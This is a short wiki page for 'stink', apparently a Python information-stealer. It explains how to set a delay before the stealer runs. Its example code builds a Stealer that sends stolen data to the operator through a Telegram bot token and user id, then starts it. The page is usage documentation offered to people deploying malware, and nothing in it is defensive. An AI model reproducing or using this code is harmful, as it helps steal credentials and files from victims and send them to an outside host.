Delay before execution - FallenAstaroth/stink GitHub Wiki

Introduction

You can add a delay before executing the code if necessary. By default, the delay is 0.

Changing

  1. Pass the delay parameter with the number of seconds to Stealer.

Example usage

from stink import Stealer, Senders

if __name__ == '__main__':
    Stealer(
        senders=[
            Senders.telegram(token="YOUR_TOKEN", user_id=YOUR_ID),
        ],
        delay=10
    ).run()